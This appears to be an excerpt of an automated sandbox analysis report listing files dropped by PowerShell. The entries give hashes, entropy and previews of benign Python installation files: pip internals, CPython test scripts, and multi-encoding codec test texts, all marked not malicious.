                                                                                                                                                                                                                      Preview:import functools.import os.import sys.import sysconfig.from importlib.util import cache_from_source.from typing import Any, Callable, Dict, Generator, Iterable, List, Optional, Set, Tuple..from pip._internal.exceptions import UninstallationError.from pip._internal.locations import get_bin_prefix, get_bin_user.from pip._internal.metadata import BaseDistribution.from pip._internal.utils.compat import WINDOWS.from pip._internal.utils.egg_link import egg_link_path_from_location.from pip._internal.utils.logging import getLogger, indent_log.from pip._internal.utils.misc import ask, normalize_path, renames, rmtree.from pip._internal.utils.temp_dir import AdjacentTempDirectory, TempDirectory.from pip._internal.utils.virtualenv import running_under_virtualenv..logger = getLogger(__name__)...def _script_names(. bin_dir: str, script_name: str, is_gui: bool.) -> Generator[str, None, None]:. """Create the fully qualified name of the files created by. {console,gui}_scripts for the given ``d
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):48
                                                                                                                                                                                                                      Entropy (8bit):4.246115365169272
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:SfPIAFy6WIXtH0EEov:SS9SH9Eov
                                                                                                                                                                                                                      MD5:3D02598F327C3159A8BE45FD28DAAC9B
                                                                                                                                                                                                                      SHA1:78BD4CCB31F7984B68A96A9F2D0D78C27857B091
                                                                                                                                                                                                                      SHA-256:B36AE7DA13E8CAFA693B64B57C6AFC4511DA2F9BBC10D0AC03667FCA0F288214
                                                                                                                                                                                                                      SHA-512:C59C5B77A0CF85BB9FBF46F9541C399A9F739F84828C311CED6E270854ECCE86D266E4C8D5AA07897B48CE995C3DA29FEA994E8CD017D48E5A4FAB7A6B65E903
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# Dummy file to make this directory a package...
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):69
                                                                                                                                                                                                                      Entropy (8bit):4.463597559874291
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:1RpJMwC2W6RFMXBcVkhIO2ABn:1RpJC2MxjHnB
                                                                                                                                                                                                                      MD5:3A6B0AE352B56947E4A2BCFA1CE208C1
                                                                                                                                                                                                                      SHA1:3DEE00F39FD447261F8D3731955619ACC1F9CEE3
                                                                                                                                                                                                                      SHA-256:3AD8E97956F832A129BD2E166F220884C542373117F73C28E8EB9D426DB3BD10
                                                                                                                                                                                                                      SHA-512:8D9D5D10FE654AC4A9C384F0A646F52ECA216C18F42956E1DD9A424361918F1DADE932A9B9C2847ABE1914B751E4947738BFE1425AA22D4D9098F9FA07D85FBC
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:from test.libregrtest.main import main..main(_add_python_opts=True)..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):3837
                                                                                                                                                                                                                      Entropy (8bit):4.441925532060228
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:94H1ZtYdcX4hR2U6jDPsZTFSPlVy757hgliEM3TgJM3UvmgCmLMsgXA:9o70clpjDPs0lVy757iliEMcJMkvpCsJ
                                                                                                                                                                                                                      MD5:4E15155129B504E325210A11A9750855
                                                                                                                                                                                                                      SHA1:1586604BD9ECF192E019F196F0621813C443863E
                                                                                                                                                                                                                      SHA-256:A1B1BE277E44D760DA2E71358773F51621F1AC81C4094A67FAD2E81B41EFA136
                                                                                                                                                                                                                      SHA-512:3924AEABAD5668D0CE8E0CA28F079BFAAD68A3E091CC43C718FC9DD5D6B8D5934ACAB4B28B69481B9502A70CA09D8B5CFC1409891841444028F2716220669359
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:"""..Tests run by test_atexit in a subprocess since it clears atexit callbacks..."""..import atexit..import sys..import unittest..from test import support......class GeneralTest(unittest.TestCase):.. def setUp(self):.. atexit._clear().... def tearDown(self):.. atexit._clear().... def assert_raises_unraisable(self, exc_type, func, *args):.. with support.catch_unraisable_exception() as cm:.. atexit.register(func, *args).. atexit._run_exitfuncs().... self.assertEqual(cm.unraisable.object, func).. self.assertEqual(cm.unraisable.exc_type, exc_type).. self.assertEqual(type(cm.unraisable.exc_value), exc_type).... def test_order(self):.. # Check that callbacks are called in reverse order with the expected.. # positional and keyword arguments... calls = [].... def func1(*args, **kwargs):.. calls.append(('func1', args, kwargs)).... def func2(*args, **kwargs):..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):18712
                                                                                                                                                                                                                      Entropy (8bit):4.5629781372890035
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:YrqB8BJOKPl04Pz7oifzu7I/FkebMeCbtKc:YrW8BV3r71gI/FzbM3t/
                                                                                                                                                                                                                      MD5:D110D2CEC4172EDB66EA5F5C3EC628AC
                                                                                                                                                                                                                      SHA1:DCA34F341C20A794DE688B2E78ABC7F1DAE4BCE6
                                                                                                                                                                                                                      SHA-256:2E3A9BFF665A37CD84E8699DDC21B4809ACEA79860D3A1E04998F7891D2B34E0
                                                                                                                                                                                                                      SHA-512:C27B7626888548AB4EBA26C8BC550E72465C905F40BB5951296C3FCF877848182438C164A445A4D25465E34EBA5AB25EEB465B1FEE48EC6E5A0F32EE43764512
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:"""..This test suite exercises some system calls subject to interruption with EINTR,..to check that it is actually handled transparently...It is intended to be run by the main test suite within a child process, to..ensure there is no background thread running (so that signals are delivered to..the correct thread)...Signals are generated in-process using setitimer(ITIMER_REAL), which allows..sub-second periodicity (contrarily to signal())..."""....import contextlib..import faulthandler..import fcntl..import os..import platform..import select..import signal..import socket..import subprocess..import sys..import time..import unittest....from test import support..from test.support import os_helper..from test.support import socket_helper......# gh-109592: Tolerate a difference of 20 ms when comparing timings..# (clock resolution)..CLOCK_RES = 0.020......@contextlib.contextmanager..def kill_on_error(proc):.. """Context manager killing the subprocess if a Python exception is raised."""..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):793
                                                                                                                                                                                                                      Entropy (8bit):5.509364554234891
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:tFVLgi38iPyidBkmhGwPaQ+tSHPNTXqgGGMXLchYf7RUcZ5ZDn:tFV0i+idBkOSQ+WPPGrXLch8UctDn
                                                                                                                                                                                                                      MD5:0E10E0A54F6CBAC570BCDF1F875C52CD
                                                                                                                                                                                                                      SHA1:9DF145F7F38A8C75E9575D96E524F05C2578E0A2
                                                                                                                                                                                                                      SHA-256:C27282FD2AE5688BE2831FD6C76AAFFB7A7577026DE0FD2BB8D41326DACB2E7A
                                                                                                                                                                                                                      SHA-512:8A2D868285A9D7F5DDC6EE910E3886586B2E72FBAD961EC80F60919CAA9ACD3E0BDD9D48378D45461F0983A87B7B1FE336C742B3392BE8500AD352EEC441F6C9
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:Python .......1990 .......................... Guido van Rossum ...................ABC.......................ABC ..........................................Guido ................................. BBS .................... ................. Guido ..........Python................................. Python .........................................................................................................................................Python ................................................................................................ Python ................ .. ....... .... ........
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1094
                                                                                                                                                                                                                      Entropy (8bit):5.10143839860704
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:tFIJ+UfttUAPJxd0b/Gl5NFW4sBF+/LOiqM33E6+F6T:tFIwl0JxdKGXu45KiqMkLgT
                                                                                                                                                                                                                      MD5:CC34BCC252D8014250B2FBC0A7880EAD
                                                                                                                                                                                                                      SHA1:89A79425E089C311137ADCDCF0A11DFA9D8A4E58
                                                                                                                                                                                                                      SHA-256:A6BBFB8ECB911D13581F7713391F8C0CEEA1EDD41537FDB300BBB4D62DD72E9B
                                                                                                                                                                                                                      SHA-512:C6FB4A793870993A9F1310CE59697397E5334DBB92031AB49A3ECC33C55E84737E626E815754C5DDBE7835B15D3817BF07D2B4C80EA5FD956792B4DB96C18C2F
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:Python .....1990 ................... Guido van Rossum ...............ABC...............ABC .............................Guido .......................... BBS .............. ............ Guido .......Python....................... Python ...............................................................................................Python ...................................................
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ISO-8859 text
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):760
                                                                                                                                                                                                                      Entropy (8bit):5.444717516207928
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:tFV36/+Iocdi3n69iWGJwift5dXRk0jDj5GwWmEiWQBYNQGltSHPugZtXvygGGMT:tFVLgi38iPyidBkmhGwPaQ+tSHPNTXqX
                                                                                                                                                                                                                      MD5:5635F33A1B96B028532BE06BEF90364B
                                                                                                                                                                                                                      SHA1:C60221C896FD832D3DD74FD4835B8BF5577B459C
                                                                                                                                                                                                                      SHA-256:BA0998B7A6A1B2FC45F847DBEA1D2F9DC889104832B0042B5EBE335E677EFD30
                                                                                                                                                                                                                      SHA-512:2E356E085931365BC918252106B5679CB3AC65B7303D214288584907880BB3107C49B75CEC7BFF4B046CD0A0EFA852DA0CCC465320DA51482FCCD16F9C08D977
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:Python .......1990 .......................... Guido van Rossum ...................ABC.......................ABC ..........................................Guido ................................. BBS .................... ................. Guido ..........Python................................. Python .........................................................................................................................................Python ................................................................................................ Python .............
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):586
                                                                                                                                                                                                                      Entropy (8bit):5.287226240289109
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:1m2iKxcYJtJOCsoldYG+PuxA4U8fxlST4KsToYNU9Izcl8n:1mHKxcwJdswdY4Nxlg4lh88
                                                                                                                                                                                                                      MD5:D0CB1CCBBE2DC24FB0B1CDF0CE62E08A
                                                                                                                                                                                                                      SHA1:9F5AC71005DE9B0CE7286EB0B960017CE58BEF3A
                                                                                                                                                                                                                      SHA-256:094A6A62ABF390C3376E5ED6515082BBCD70C2A6CB335A9F0378A1222D08F7D2
                                                                                                                                                                                                                      SHA-512:0912B3582C3CFCDDE433E724832F468CCADCE40C6B49F05EBD4F970A44199BA3D1F99FCA8D1B8A304512EC78199610DAD6210108C2AE58F0CEAC77D8DA464289
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:. ...(Python). ... .., ... ..... ...... ......... ... ... ... ..... .... ................. .... ..(..). ... .. ..., ... ......... .... ..... .. ..... .... ...... ......... ... . . .. .... ... .............: ... ...~ ..! .... ..... .. ... ....
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ISO-8859 text
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):456
                                                                                                                                                                                                                      Entropy (8bit):5.711470315703117
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:fdtHuxXJBzc+6eaYXjD7E4Qyd4JAJh2gM5Urq/cmqcFoHKwR+u6kWcoWa+iK7SF:nHAlB19D71PJpMcmqppLWPWaxjF
                                                                                                                                                                                                                      MD5:861860A2856CE076043EFF83CB0822BA
                                                                                                                                                                                                                      SHA1:656A2885FE096F5B599132D5D59F4D3526449350
                                                                                                                                                                                                                      SHA-256:5BC47B4BC6D60577CA938DA25B3AE68271DE889B383B4CFBAC55D8E41D476390
                                                                                                                                                                                                                      SHA-512:39AABA5AA679167B73ED595E362535B99ABF198CC33FFE79F165A0CF3776264D5BA127CBC3EE6C498CF0FEE09DF420CABB77159C72AC25FC6B0BACA068C9F076
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:.. .....(Python).. .... ...., ...... ........ ........ ............... ..... ...... ...... .......... ....... ........................... ....... ...(...).. ...... .... ....., ..... ................ ....... ........ .... ........ ...... ........... ............... ...... .. .. ... ....... .... ...................: ..... ............~ .......! ........... ............ ....... ..... ..........
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1127
                                                                                                                                                                                                                      Entropy (8bit):6.071601232868222
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:tOAvNVSW/8PW1y2iQjypJxQQrzP72ocg3BoGlIOh7Z/gaVXEnKAhQZn+LnLBRBIJ:tOAvDS0hU2PKV7GeBHH7JN0nbh8n+Ln+
                                                                                                                                                                                                                      MD5:4B7DA9734477DC2C192F5B18904EF8EE
                                                                                                                                                                                                                      SHA1:A8AEDFD17076232AC72D066915CF25CE7B24F044
                                                                                                                                                                                                                      SHA-256:97D18CE1D42DA357521F5AF5803816D3C4BADE38950F69CFF512A236F763585B
                                                                                                                                                                                                                      SHA-512:BF7D558755D4DB05287AFA4CBB23A58DDE0C9AF37C16C291BE470A982D5A76ADE6B4DE4ED62FA60B9A6462356F3564E5280D7096FD9BCFD8BC9F2DD5D6AF7DC1
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:Python.................................................................................................................................................................... Python ...... C library?.............., .................... ..........., .................library, .... fast prototyping . programming language ...... ........ library .. C .., . Python ....fast prototyping . programming language. ...........C library .. Python .......... .....
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):864
                                                                                                                                                                                                                      Entropy (8bit):6.599965005261192
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:tY7Rcnf8+THR2Nu7nMlMjYN4vtnbJ/ccPGwIzdARAIm8:t+cfNwNu7nUY1nbJ/BPGwIWRC8
                                                                                                                                                                                                                      MD5:F8469BF751A9239A1038217E69D82532
                                                                                                                                                                                                                      SHA1:0CE00019ED8D5C343ACBD149A9B66E6E710BB617
                                                                                                                                                                                                                      SHA-256:E4DE892443028C3F230AB37E0C658F5BD0246B07147005580C2904B733ECF4FC
                                                                                                                                                                                                                      SHA-512:A74F6BB0FE4CD9C79B5CEDBDBCAFB9D72CE3B4995DEFF76C3770A39DC5782AB4F2993CAEE65C872E5479E909408724B4D8075CD6BF0CD825F3649AE2E0D3912D
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:Python........................................................................................................................................................................................................................................................... Python ......... C library?......Y........l......, ._.l...y...w................n.}. ....._.l...y......, ..................._.l....library, .K..... fast prototyping .. programming language ......... .....S.S.... library .... C ...., .. Python ......fast prototyping .. programming language. .................C library ... Python ..h....y........ .........................}....:..5.1.3.3.2.1.3.1 .7.6.0.4.6.3 .8.5.8.6.3.5 .3.1.9.5 .0.9.3.0 .4.3.5.7.5.5 .5.5.0.9.8.9.9.3.0.4 .2.9.2.5.9.9...
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):480
                                                                                                                                                                                                                      Entropy (8bit):5.558398357158277
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:tOAvNBzSW/8BZW1y2jVEp7QjyLCeYGOiz/xQQ73zPlp7/yocg3fL:tOAvNVSW/8PW1y2iQjypJxQQrzP72oc2
                                                                                                                                                                                                                      MD5:6BF152CE10F171A92498A876DFF924B3
                                                                                                                                                                                                                      SHA1:887E6E09D5D33DCE222A061321F5E87C89A1C3C3
                                                                                                                                                                                                                      SHA-256:3624859618C952810487E41736753CF32F4570DC6248FDA1091771F56019A3F9
                                                                                                                                                                                                                      SHA-512:7B92AD74366725819A4D34B48E0CE1EFFB504B0B755A1B183CF2E91019A2999CDE7230349372AA697410B4DFCF839EA1D428DD29A8C2EEC438C29D834A47E2F5
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:Python..................................................................................................................................................................
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ISO-8859 text
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):324
                                                                                                                                                                                                                      Entropy (8bit):5.920409403258472
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:trT6VR7jCosyaMWkv3wjcwSN+IcKr0utmvhan9onH/TgPQhyaiBKG3:tnkR7RtgjnwefnHcjajG3
                                                                                                                                                                                                                      MD5:92F0222A8CB4145D0FF1914543F4B450
                                                                                                                                                                                                                      SHA1:092FF5C24E534C2EDF1403343CEEE141DE6548FF
                                                                                                                                                                                                                      SHA-256:6E4CEB607215FF447544CB0D785493E1E855852F874AF7C67D8E8AFE859F5395
                                                                                                                                                                                                                      SHA-512:6403553B1FEE46408C0C7EB68DEBD2BDABA8A4D85A19D5B336BD1ADD9252B58E275ADACFEEFDC84CF44B682710B2667B14B04436C34541CA9DC14986C31F8798
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:Python.......................................................................................................................................................................................................................................................
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1043
                                                                                                                                                                                                                      Entropy (8bit):5.976885392098318
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:tOAvNVSW/8PW1y2iQjypJxQQrzP72ocg3BoGlIOh7Z/gaVXEnKAhQZn+LnLBRBIT:tOAvDS0hU2PKV7GeBHH7JN0nbh8n+LnU
                                                                                                                                                                                                                      MD5:02E5888560EE37D0393906435E768B70
                                                                                                                                                                                                                      SHA1:6DE6445FBA5FD47E1F47BF980CD1FA90C28F13CF
                                                                                                                                                                                                                      SHA-256:47112543ABE89682D8CCD47E7FEDB25447A4C5133F8DB313772AB6ED87729371
                                                                                                                                                                                                                      SHA-512:DEA2C6EE0D53274839125584966BA512E4ABE5460B81C8E77AD90BCCF261FC432E3FB92D99D92B0B5F39A8146A56B784EB3AC404254B1D5231F895BF48CF5ECF
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:Python.................................................................................................................................................................... Python ...... C library?.............., .................... ..........., .................library, .... fast prototyping . programming language ...... ........ library .. C .., . Python ....fast prototyping . programming language. ...........C library .. Python .......... .....
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):755
                                                                                                                                                                                                                      Entropy (8bit):6.42810162365628
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:tnkR7RtgjnwefnHcjajGNyzlsqq1scWjR2N5AXLnMlMjYW44vtnbJ5lccX/4LwIc:tY7Rcnf8+THR2Nu7nMlMjYN4vtnbJ/ce
                                                                                                                                                                                                                      MD5:7654AB650A6062CE04BF414EECE4EB27
                                                                                                                                                                                                                      SHA1:D58952A91E9818CF1FA4A1CEE622609316E6B0B7
                                                                                                                                                                                                                      SHA-256:B91E1C1C38B7150CBC174A2F0C06BD1D60A411222D09E21927254B7A86103948
                                                                                                                                                                                                                      SHA-512:EB370055681BC520464D30FDF8A99EB8AA4500E43773676187B4AF6313CCE241770042BB5ED54EE79204A73544F1C47B5F2E9D6EE137B0DF173AE745B079FA30
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:Python........................................................................................................................................................................................................................................................... Python ......... C library?......Y........l......, ._.l...y...w................n.}. ....._.l...y......, ..................._.l....library, .K..... fast prototyping .. programming language ......... .....S.S.... library .... C ...., .. Python ......fast prototyping .. programming language. .................C library ... Python ..h....y........ .........................}....:..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):89
                                                                                                                                                                                                                      Entropy (8bit):4.886529044072407
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:hWumyAQiasb0F0dRFDAQkADoqDJSMvurcxbn:hcQiasgkRFcQkAUqjvOkbn
                                                                                                                                                                                                                      MD5:4CCF2974AB0E33E62ACDE809E868EB1F
                                                                                                                                                                                                                      SHA1:327E34C57CC02A89EBCBBD5B1E01B43D2ADE7309
                                                                                                                                                                                                                      SHA-256:1FE0A36192EF7643ADB06B14979E006C17834874E7DF605D915E549E3025E8AE
                                                                                                                                                                                                                      SHA-512:A6897D06404F08D11A484E4BA769489336F6A6DC77EA73F7FF29F873FF3A43A13268E4AF105677BBFF68EF081B1937ED10AC8055BAFD747850CA07E03B2A5863
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:This sentence is in ASCII..The next sentence is in GB...........Bye..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):83
                                                                                                                                                                                                                      Entropy (8bit):4.767338341785896
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:hWumyAQiasb0F0dRFDAQkveRBn7ALv:hcQiasgkRFcQkveKv
                                                                                                                                                                                                                      MD5:A88DF5E936466DE8045D6BED4CCD802B
                                                                                                                                                                                                                      SHA1:06934776B9E98BEE0BF30422F8E536EC955E8E6C
                                                                                                                                                                                                                      SHA-256:832D96C16368E74F1615D025CC296472CFF2507B0F0824959EF98F86FD677637
                                                                                                                                                                                                                      SHA-512:21E40D7499004332BD60714C483B0F116D0245A6EBBAE82BD0F079493256E7092BCE65591301926620EBF0338343ABE51416BF0D2B4E68E42C573E63D213AA12
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:This sentence is in ASCII..The next sentence is in GB.~{<:Ky2;S{#,NpJ)l6HK!#~}Bye..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1094
                                                                                                                                                                                                                      Entropy (8bit):5.10143839860704
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:tFIJ+UfttUAPJxd0b/Gl5NFW4sBF+/LOiqM33E6+F6T:tFIwl0JxdKGXu45KiqMkLgT
                                                                                                                                                                                                                      MD5:CC34BCC252D8014250B2FBC0A7880EAD
                                                                                                                                                                                                                      SHA1:89A79425E089C311137ADCDCF0A11DFA9D8A4E58
                                                                                                                                                                                                                      SHA-256:A6BBFB8ECB911D13581F7713391F8C0CEEA1EDD41537FDB300BBB4D62DD72E9B
                                                                                                                                                                                                                      SHA-512:C6FB4A793870993A9F1310CE59697397E5334DBB92031AB49A3ECC33C55E84737E626E815754C5DDBE7835B15D3817BF07D2B4C80EA5FD956792B4DB96C18C2F
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:Python .....1990 ................... Guido van Rossum ...............ABC...............ABC .............................Guido .......................... BBS .............. ............ Guido .......Python....................... Python ...............................................................................................Python ...................................................
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with escape sequences
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):868
                                                                                                                                                                                                                      Entropy (8bit):5.313872116803041
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:tFtmxdBVjYA797NKicebzdPygGlVuvcwkJDEZ:tFgVxrCKzt5GruvcwhZ
                                                                                                                                                                                                                      MD5:07175BDABD0BAFCF56DDAF996F9FB56C
                                                                                                                                                                                                                      SHA1:BC0C77AD3D8D96A9805030829451EBE19A3D4E62
                                                                                                                                                                                                                      SHA-256:4FD472CF3011F3F9D3B072EAC5592B4C58C7895ED2C41763590258EE8551EF7A
                                                                                                                                                                                                                      SHA-512:19B8A89CA05D5A6794B1BA89CC66D5422557D282108A3147346EAED2E74F2A885BE1F8BFB850DB1D0F036A5C3EC88EFEFD62EDD28E9B843FC4F9E41D02054C82
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:Python .$B$N3+H/$O!".(B1990 .$BG/$4$m$+$i3+;O$5$l$F$$$^$9!#.(B..$B3+H/<T$N.(B Guido van Rossum .$B$O650iMQ$N%W%m%0%i%_%s%08@8l!V.(BABC.$B!W$N3+H/$K;22C$7$F$$$^$7$?$,!".(BABC .$B$O<BMQ>e$NL\E*$K$O$"$^$jE,$7$F$$$^$;$s$G$7$?!#.(B..$B$3$N$?$a!".(BGuido .$B$O$h$j<BMQE*$J%W%m%0%i%_%s%08@8l$N3+H/$r3+;O$7!"1Q9q.(B BBS .$BJ|Aw$N%3%a%G%#HVAH!V%b%s%F%#.(B .$B%Q%$%=%s!W$N%U%!%s$G$"$k.(B Guido .$B$O$3$N8@8l$r!V.(BPython.$B!W$HL>$E$1$^$7$?!#.(B..$B$3$N$h$&$JGX7J$+$i@8$^$l$?.(B Python .$B$N8@8l@_7W$O!"!V%7%s%W%k!W$G!V=,F@$,MF0W!W$H$$$&L\I8$K=EE@$,CV$+$l$F$$$^$9!#.(B..$BB?$/$N%9%/%j%W%H7O8@8l$G$O%f!<%6$NL\@h$NMxJX@-$rM%@h$7$F?'!9$J5!G=$r8@8lMWAG$H$7$F<h$jF~$l$k>l9g$,B?$$$N$G$9$,!".(BPython .$B$G$O$=$&$$$C$?>.:Y9)$,DI2C$5$l$k$3$H$O$"$^$j$"$j$^$;$s!#.(B..$B8@8l<+BN$N5!G=$O:G>.8B$K2!$5$(!"I,MW$J5!G=$O3HD%%b%8%e!<%k$H$7$FDI2C$9$k!"$H$$$&$N$,.(B Python .$B$N%]%j%7!<$G$9!#.(B..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):563
                                                                                                                                                                                                                      Entropy (8bit):5.275856772348662
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:1m2iKxcYJtJOCsoldYG+PuxA4U8fxlST4KsToYNU9UbcG:1mHKxcwJdswdY4Nxlg4lhuScG
                                                                                                                                                                                                                      MD5:4E84C3DE668479B44178EF915617A250
                                                                                                                                                                                                                      SHA1:E94F66555B88A666C4A6D661B4C9D50B8377154D
                                                                                                                                                                                                                      SHA-256:78099B6154509CE59732B68A909EF7DC465724F68B184383CE2400642E6501D5
                                                                                                                                                                                                                      SHA-512:5CFD7992D5E221201EA402FC4C91238F555CE262D05819CFC26BEB76824A7C0BFEC4A7A2B456B9BFBCDBD7ABB8085A38D2F301CB62971F92E493956C6804B0A0
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:. ...(Python). ... .., ... ..... ...... ......... ... ... ... ..... .... ................. .... ..(..). ... .. ..., ... ......... .... ..... .. ..... .... ...... ......... ... . . .. .... ... .............: ... .~ .! ... .... ... ...
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):502
                                                                                                                                                                                                                      Entropy (8bit):5.421997982635125
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:xf+O+JtaWxzZ6FO/OhBiGE/D3LxMAFF8VjjnPv:MFSG/RMAFAHPv
                                                                                                                                                                                                                      MD5:91EC3909D2074103DA3FC3A5A71C8FED
